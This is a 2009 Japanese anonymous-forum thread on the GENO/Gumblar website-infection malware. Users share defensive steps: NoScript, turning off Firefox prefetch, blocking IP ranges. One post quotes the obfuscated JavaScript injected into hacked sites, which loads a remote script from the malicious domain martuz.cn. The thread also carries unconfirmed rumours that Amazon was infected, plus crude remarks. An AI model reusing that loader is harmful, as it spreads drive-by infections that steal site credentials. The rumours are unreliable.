Noscriptなら許可したサイトを開いても94.247.2.195は許可されないから問題ないんじゃないの?

638:名無しさん@お腹いっぱい。
09/05/16 12:18:49
>>636
くそがああああああああああああ
俺を早く安心させてくれ

639:名無しさん@お腹いっぱい。
09/05/16 12:19:02
裁判員に選ばれたらウイルス製作者を死刑にしようと思う。

640:名無しさん@お腹いっぱい。
09/05/16 12:20:15
>>631
数回仮想環境で感染してみたけどcmdとregedit普通に動作出来たり
再度感染すると出来なかったりバラバラみたい

641:名無しさん@お腹いっぱい。
09/05/16 12:20:27
>>638
回線をハサミで切ったらおk

642:名無しさん@お腹いっぱい。
09/05/16 12:20:32
NO scriptなんて甘っちょろいことしないでjava全部無効でいいだろ
you tubeとか見れなくなるけどさ

643:名無しさん@お腹いっぱい。
09/05/16 12:21:02
>>631
SQL ServerやMSDE、Visual Studio等を入れるとバージョンによってサイズ変わるよ。
ファイルの更新日付が最近じゃなければ、sqlsodbc.chmそのものはそれほど
気にする必要がない。他の症状が何もないなら気にしなくていいと思う。

644:名無しさん@お腹いっぱい。
09/05/16 12:21:09
javascriptじゃない感染方法もあるんじゃないの?

645:名無しさん@お腹いっぱい。
09/05/16 12:21:36
FirefoxでNoScript入れて無くてもJavaScriptを有効にしてなければ平気?

646:600
09/05/16 12:21:39
おいお前らJavaScriptを略すならjsにしろ
Javaと区別つかねーだろうが

647:名無しさん@お腹いっぱい。
09/05/16 12:22:07
>>613
>>615
さっきやって分かった。FirefoxはデフォルトだとGoogleのリンク先先読み設定あるから、
about:config で network.prefetch-next を falseにしとけ。

648:名無しさん@お腹いっぱい。
09/05/16 12:22:09
捕まえたやつに数億賞金出せばおもしろいことになりそうだな

649:名無しさん@お腹いっぱい。
09/05/16 12:22:40
>>632
自分で許可しなければ、全て禁止ですwww

650:名無しさん@お腹いっぱい。
09/05/16 12:22:43
>>640
共通項ってなかった?

651:名無しさん@お腹いっぱい。
09/05/16 12:23:28
はぁ、おっぱい見てぇ

652:名無しさん@お腹いっぱい。
09/05/16 12:23:35
>>647
これ、さっきのりぶメールって何のサイトなんだろうと思ってぐぐったら
検索結果が表示された瞬間Avast!が吼えまくったんで気づいたんだ。

653:名無しさん@お腹いっぱい。
09/05/16 12:23:36
>>632
いやお前のNoScriptの設定でgoogle.co.jpかgoogle.comを禁止してるだけだろ
Noscript入れたばかりでそうなってるかもしれないけど

654:名無しさん@お腹いっぱい。
09/05/16 12:23:41
FireFoxにNoScriptでウイルス回避しても
行きつけのサイトをスクリプト許可していたら危険URLに飛ばされるだろうし
上級者なら気づくが超初心者ならスクリプトの許可をしそうでやばいな

655:名無しさん@お腹いっぱい。
09/05/16 12:23:50
>>635
それにGENOだけじゃなく普通の新種ウイルスにも注意するべきだろw

656:名無しさん@お腹いっぱい。
09/05/16 12:24:07
>>637
どういうこと?詳しく

657:名無しさん@お腹いっぱい。
09/05/16 12:25:00
631です

sqlサーバー入ってる
…けどファイルの最終更新日が、同人の方で感染報告してる人たちと同じみたいなのでやっぱ怪しいわ

658:名無しさん@お腹いっぱい。
09/05/16 12:25:02
>>647
日本語で頼む

659:名無しさん@お腹いっぱい。
09/05/16 12:25:22
>>654
VistaのUACも同じだろな
うっかり「OK」をクリックしそうだ

660:名無しさん@お腹いっぱい。
09/05/16 12:25:32
>>644
objectタグ使うとかありうるよな。
ftpアカウント取っちゃってるんだから、新たなおいしい脆弱性が発見されるまで
発症しないで潜んでるなんていうのもありうる。

661:名無しさん@お腹いっぱい。
09/05/16 12:25:49
>>647
ありがと!

662:名無しさん@お腹いっぱい。
09/05/16 12:25:54
>>527
作ってお願い。

663:名無しさん@お腹いっぱい。
09/05/16 12:25:57
>>647
>>652
なるほど
気を付ける

664:名無しさん@お腹いっぱい。
09/05/16 12:26:24
一番はやっぱりプラグインの無効化だろう

665:名無しさん@ゴーゴーゴーゴー!
09/05/16 12:27:15
Adobe Flash Player を最新版にしたらおかしくなるんだけど…いろいろ見れなくなる
これってこのウイルスのせいなの?
もう一か月以上続いてるんですけど・・・;

666:名無しさん@お腹いっぱい。
09/05/16 12:27:36
>>647
してやったぞ
ありがたく思え

667:名無しさん@お腹いっぱい。
09/05/16 12:28:19
>>649,653
なんか俺が馬鹿みたいじゃん^^;

668:名無しさん@お腹いっぱい。
09/05/16 12:28:23
>>665
それは普通に更新したらおかしくなる不具合でてる
完全に削除してから入れると良い

669:名無しさん@お腹いっぱい。
09/05/16 12:28:25
緊張感でチンポしゃぶりたくなってきた

670:名無しさん@お腹いっぱい。
09/05/16 12:29:37
>>647
変更したありがとう

671:名無しさん@お腹いっぱい。
09/05/16 12:29:44
何かもうやること多くてやんなっちゃうな
感染してもおkなPC用意して見た方が楽かもしれん

672:名無しさん@お腹いっぱい。
09/05/16 12:30:06
FIREFOXで安心が買えるのか?
心配になってきた…

673:名無しさん@お腹いっぱい。
09/05/16 12:30:15
>>671
そこでLinuxですよ旦那!!

674:名無しさん@お腹いっぱい。
09/05/16 12:30:31
>>656
noscriptはjsを個別にjsのドメインで許可不許可できる
今までみたいなjs全許可不許可とは全くの別物

675:名無しさん@お腹いっぱい。
09/05/16 12:31:02
感染してるかもしれないサイトを、更新チェッカー(WWWC)でチェックしても大丈夫ってことだよね。

今のところ不気味なことは起きてないし。

676:名無しさん@お腹いっぱい。
09/05/16 12:31:14
>>647のやり方誰か教えてくれ

677:名無しさん@お腹いっぱい。
09/05/16 12:31:24
95.129.144.0/23 全焼きしておこう

678:名無しさん@お腹いっぱい。
09/05/16 12:32:20
>>647
ありがとう、勉強になった

679:名無しさん@お腹いっぱい。
09/05/16 12:32:43
>>671
上級者も根を上げそうですか

680:コピペ
09/05/16 12:33:00
URLリンク(www3.atword.jp)

*** 緊急 ***

gumblar.cn 95.129.145.58 の代わり

martuz.cn
95.129.145.58

IP addr は変更されていませんが gumblar.cn のドメインベースのみでブロックしている方は注意してください。

------------------------------------------------

>>560
このサイトは既に martuz.cn になっている。

(function(){var UkRR='%';var WdBp=('var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j " a "Major" b+a+"Minor" b a "Build" b "j;");
document.write("<script src=//martu" "z.cn/vid/?id="+j "><\/script>");}').replace(//g,UkRR);eval(unescape(WdBp))})();

681:名無しさん@お腹いっぱい。
09/05/16 12:33:03
ジェノサイドウイルスか

682:名無しさん@お腹いっぱい。
09/05/16 12:33:20
通販サイトでサイズ表を見ようとしたらエラーになるんだがやられたのかな

>モール/ストアでは現在問題が発生しています。
>あとでもう一度試してください。
>コマンド構造の失敗
>(CMN0950E)
>コマンドを完了できません。コマンド構文が正しくないか、システムが必要とするパラメーターが渡されていません。

わりと大手のところなんだがこんなんじゃ迂闊にネットできないな

683:名無しさん@お腹いっぱい。
09/05/16 12:33:24
>>665
URLリンク(www.adobe.com)
ここからアンインストーラを落として、アンインスコ→再インスコし直してごらん

684:名無しさん@お腹いっぱい。
09/05/16 12:33:53
>>676
「about:config」でググれ。

でも、ググる前に、about:configでnetwork.prefetch-nextを無効にしておけよ。


685:名無しさん@お腹いっぱい。
09/05/16 12:33:58
>>676
火狐のロケーションバーにabout:config 入れろ

686:名無しさん@お腹いっぱい。
09/05/16 12:34:15
>>676
Firefoxのアドレス欄にabout:configってコピペ、Enter、
ずらずらーーーーーってアルファべ順に出てくる項目の中から
network.prefetch-nextを探して洗濯、右クリでtrueをfalseに変更

687:名無しさん@お腹いっぱい。
09/05/16 12:34:23
>>684
クソワロタwwww

688:名無しさん@お腹いっぱい。
09/05/16 12:34:45
>>682
名前出そうよ
隠してる場合じゃないだろ

689:名無しさん@お腹いっぱい。
09/05/16 12:35:08
FirefoxのURLバーに「about:config」と入力する。※警告が出てきても大丈夫
上の検索で「network.prefetch-next」と入力して、出てきた値がtrueだったらダブルクリック→falseにする。
あとFasterfoxだっけか?あれの先読みも切った方がいいかな

690:名無しさん@お腹いっぱい。
09/05/16 12:35:16
>>682
ニッセンとかムトウとか?

691:名無しさん@お腹いっぱい。
09/05/16 12:35:38
>>686
network.prefetch-nextを探してとかクソだるいから、ずらずら出てるとこの上の
フィルタってとこにまんま「network.prefetch-next」入れろ。したらFirefoxが探して
くれるから。

692:名無しさん@お腹いっぱい。
09/05/16 12:36:10
>>685
トンクス

693:名無しさん@お腹いっぱい。
09/05/16 12:36:19
Genoウイルスが更に凶悪化したら
上級者のお前らでも対応できるのか!

まあ無理と思うがなー

694:名無しさん@お腹いっぱい。
09/05/16 12:36:34
>>676じゃないが怖くてググれなかったから助かったwwwありがとうww


695:名無しさん@お腹いっぱい。
09/05/16 12:36:37
>>682
そうだね、あまりにも大手なら一部伏字でも名前だした方がいいかも

696:名無しさん@お腹いっぱい。
09/05/16 12:37:22
アマゾンか

697:名無しさん@お腹いっぱい。
09/05/16 12:37:44
おいおい。感染拡大してんの?

698:名無しさん@お腹いっぱい。
09/05/16 12:37:49
>>647
ありがとう

しかしこれをしたらリンクに飛ぶのが面倒になるんだな…
感染するよりはましだが

699:名無しさん@お腹いっぱい。
09/05/16 12:38:04
>>628
この犯人はただのお騒がせ目的じゃなくて
集めたパスワードとかの情報で悪い金儲けを企んでいるわけでしょ?
そのラインから捕まえられないのかなあ?

700:名無しさん@お腹いっぱい。
09/05/16 12:38:16
konozama陥落か

701:名無しさん@お腹いっぱい。
09/05/16 12:38:34
>>697
この伸び方、おもろいだろ?

702:名無しさん@お腹いっぱい。
09/05/16 12:38:34
加速度的に汚染が進みそうな予感
てか進んでるのか

703:名無しさん@お腹いっぱい。
09/05/16 12:39:01
>>676
Firefoxの先読みをOFFにするとインターネットが遅くなるがガマンしろな!

704:名無しさん@お腹いっぱい。
09/05/16 12:39:07
>>693
俺、友達にスパーハカーがいるから何とかしてもらう

705:名無しさん@お腹いっぱい。
09/05/16 12:39:16
>>698
体感速度そんな変わらなかったけどなあ。

706:名無しさん@お腹いっぱい。
09/05/16 12:39:28
Vistaユーザー用に C:\Windows\Help\mui以下のディレクトリにsqlsodbc.chmが存在する
ってあったんだが更新日が2006年でサイズが50KB 前後なんだよね
これってセーフでいいのかな

707:名無しさん@お腹いっぱい。
09/05/16 12:39:29
しかし、なんで同人系は感染率高いんだ?
動画サイト経由で食らったんかな?

708:名無しさん@お腹いっぱい。
09/05/16 12:39:29
falseに変えたらそのままタブ閉じちゃえばいいの?
設定ページからの戻り方が分からない

709:名無しさん@お腹いっぱい。
09/05/16 12:39:52
アマゾン陥落?
嘘だよな?

710:名無しさん@お腹いっぱい。
09/05/16 12:39:58
>>708
閉じていい。

711:名無しさん@お腹いっぱい。
09/05/16 12:40:04
今朝、他の掲示板はどうかと思ってアホーの掲示板でウィルスで探してみた
見なければ良かった・・・orz

セキュリティーソフトも入れていないのが多数
それで言い訳は初心者wwwwwwww
拡散するだろうなと思って恐ろしくなったよ


712:名無しさん@お腹いっぱい。
09/05/16 12:40:07
>>647設定したけど遅くなったりはしなかったんだぜ

713:名無しさん@お腹いっぱい。
09/05/16 12:40:31
>>704
友達のスパハカーのパソコンもGENOウイルスに感染している悪寒w

714:名無しさん@お腹いっぱい。
09/05/16 12:40:39
ええええ、アマゾン??利用しまくってるのに…
もう、怖くてネットサーフィンできないな

715:名無しさん@お腹いっぱい。
09/05/16 12:40:41
タスクマネージャー見たらASDUtility.exeが起動してた
なんだこれ

716:名無しさん@お腹いっぱい。
09/05/16 12:40:41
>>710
閉じた。ありがとう。

717:名無しさん@お腹いっぱい。
09/05/16 12:40:50
>>701
流れ早いしwやっかいそうだな

718:名無しさん@お腹いっぱい。
09/05/16 12:41:24
>>707
サイト持ちが感染→気がつかずにサイト更新→サイト見た人が感染
のループ

719:名無しさん@お腹いっぱい。
09/05/16 12:41:25
>>707
多分、見てる奴が作る奴兼ねてる率が滅茶苦茶高いから。

720:名無しさん@お腹いっぱい。
09/05/16 12:41:40
アマゾン感染ならまじでニュースになるな

721:名無しさん@お腹いっぱい。
09/05/16 12:42:04
>>706
問題ない。その日付だとMSSQL2005相当のヘルプファイルでたぶんVistaのデフォ。

722:名無しさん@お腹いっぱい。
09/05/16 12:42:05
>>712
そうか光あたりを入れてた別だな

723:名無しさん@お腹いっぱい。
09/05/16 12:42:12
豚フルの奴どこで感染したんだよ

724:名無しさん@お腹いっぱい。
09/05/16 12:42:21
PC(XP Pro Sp3)内を検索してもsqlsodbc.chm見つからないんだけれど
ないとやばいの?

725:名無しさん@お腹いっぱい。
09/05/16 12:42:22
スレチなのでいい加減止めるが
このウィルス、感染者のサイトを改竄して
普通のサイトをどんどんウィルスサイトにする所が怖い
最近では小林製薬とかのサイトも感染したんだぜ
もう述べ何万件も感染してるだろう(復旧したところもあるけど)
あんまりにも一部でしか騒がれてないからついつい書いたもにぃ

726:名無しさん@お腹いっぱい。
09/05/16 12:42:27
>>674
基本全て禁止→個別に許可じゃないの?
個別に94.247.2.195を禁止ってどうやって設定するの?

727:名無しさん@お腹いっぱい。
09/05/16 12:43:07
>>713
そしたらその日からそいつのことをスパーバカーと呼ぶことにする

728:名無しさん@お腹いっぱい。
09/05/16 12:43:07
アマゾンは釣りだろw

729:725
09/05/16 12:43:11
人生初めての誤爆orz

730:名無しさん@お腹いっぱい。
09/05/16 12:43:15
>>703
逆に早くなるんじゃないの?

731:名無しさん@お腹いっぱい。
09/05/16 12:43:19
>>707
同人サイトを検索するサーチエンジンが感染してる

732:名無しさん@お腹いっぱい。
09/05/16 12:43:28
>>722
ADSLですが快適です

733:名無しさん@お腹いっぱい。
09/05/16 12:43:36
konozama!!!!!

734:名無しさん@お腹いっぱい。
09/05/16 12:43:53
>>578
その上、経済状況までクソ悪いんだからシャレになんねーよ今の世の中wwwどうなってんだよwww

735:名無しさん@お腹いっぱい。
09/05/16 12:44:20
え、何、アマゾン陥没したんか?釣りだよな?

736:名無しさん@お腹いっぱい。
09/05/16 12:44:24
DNSプリフェッチはONでも関係ないよね? あるのかな?

737:名無しさん@お腹いっぱい。
09/05/16 12:44:33
ウイルス作るようなやつはもう終身刑でいいよ。

今回のような悪質なウイルスを作る奴は死刑。


738:名無しさん@お腹いっぱい。
09/05/16 12:44:33
混乱したら困るから釣りはやめとけ

739:名無しさん@お腹いっぱい。
09/05/16 12:44:52
>>721
ありがと
しかしVistaは大丈夫とか大丈夫でないとかどっちなんだかわけわからなくなってきてるな

740:名無しさん@お腹いっぱい。
09/05/16 12:44:58
>>735
もう、どっちでもいいよorz

741:名無しさん@お腹いっぱい。
09/05/16 12:45:11
>>705
体感速度は変わらないんだけどリンクに飛ぶたび、プログラムを選択しなくちゃいけないのがちょっとね

これで、どれだけ被害を防げるのだろう…

742:名無しさん@お腹いっぱい。
09/05/16 12:45:20
釣りはよしとけ

743:名無しさん@お腹いっぱい。
09/05/16 12:45:41
>>736
関係ない。DNSポイズニングならたいていのアンチウィルスで検知できるし。

744:名無しさん@お腹いっぱい。
09/05/16 12:45:45
>>599
おい、avast反応したぞ・・・

745:名無しさん@お腹いっぱい。
09/05/16 12:45:48
>>711
初心者はセキュリティ祖父と入れなくていいと思い込んでいそうですね^^;

746:名無しさん@お腹いっぱい。
09/05/16 12:45:51
>>741
え?なんぞそれ
どういう状況?

747:名無しさん@お腹いっぱい。
09/05/16 12:45:53
豚エンザ 報道中www がんがれますぞえ

748:名無しさん@お腹いっぱい。
09/05/16 12:46:11
>>441フンじまったから
avastで「完全な検査」したら引っ掛かりまくりだなw
俺のPC終わったなw

749:名無しさん@お腹いっぱい。
09/05/16 12:46:20
Amazonは釣り?

750:名無しさん@お腹いっぱい。
09/05/16 12:46:33
しまった今までウイルスバスターやら火狐やら積んでなかった
今この状況で何積んどけばいいんだ

751:名無しさん@お腹いっぱい。
09/05/16 12:46:38
いっそのことwindows全滅してくれれば・・・・
Mac,Linux,BSDの時代キター!?

まぁ、Vista以降だとアドレスランダム化があるから確実に進入は難しくなるけど。


752:名無しさん@お腹いっぱい。
09/05/16 12:46:44
海外渡航歴なしって神戸終わったな

753:名無しさん@お腹いっぱい。
09/05/16 12:46:57
>>743
そうですか ありがとう御座います

754:名無しさん@お腹いっぱい。
09/05/16 12:47:00
神戸って外国?

755:名無しさん@お腹いっぱい。
09/05/16 12:47:12
危険なアドを貼るときはまじで配慮しろよ
無知な奴がかなり踏んでるから

756:名無しさん@お腹いっぱい。
09/05/16 12:47:29
>>754
ワラタ

757:名無しさん@お腹いっぱい。
09/05/16 12:47:34
これどんな対策しても亜種が次々出て来てるんだよな・・・
根本的に解決できるまで専ブラで2chだけとかが安心だな

758:名無しさん@お腹いっぱい。
09/05/16 12:47:50
まあkonozama陥落してなくても
今はネットショッピングとかやめといたほうがいいだろ

759:名無しさん@お腹いっぱい。
09/05/16 12:47:52
>>726
そうだけど何が疑問なんだ?

760:名無しさん@お腹いっぱい。
09/05/16 12:48:07
>>744
Avast!って過剰反応だよな。

761:名無しさん@お腹いっぱい。
09/05/16 12:48:10
>>751
windows全滅してくれれば、
Mac,Linux,BSDにウイルス感染クルーだろ!

762:名無しさん@お腹いっぱい。
09/05/16 12:48:15
ネットでクレカ使うの怖いね今は

763:名無しさん@お腹いっぱい。
09/05/16 12:48:27
>>754
兵庫県は多国籍国家

764:名無しさん@お腹いっぱい。
09/05/16 12:48:37
新型インフルエンザが流行したら篭城してネットでも楽しむかと思えば、
そのネットに接続するのも恐ろしい事態になるとは…。

765:名無しさん@お腹いっぱい。
09/05/16 12:48:39
donutならボタンひとつでjava切れるから最強だな!!

766:名無しさん@お腹いっぱい。
09/05/16 12:48:41
国内で豚インフル…?どうせ引きこもりだし関係ないしwww
ネサフしてれば時間なんて…

…え?

767:名無しさん@お腹いっぱい。
09/05/16 12:48:59
>>746
リンク先に飛ぼうとする→このリンクは他のプログラムで開く必要があります→プログラムの選択→狐かその他を選択

みたいな流れ


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch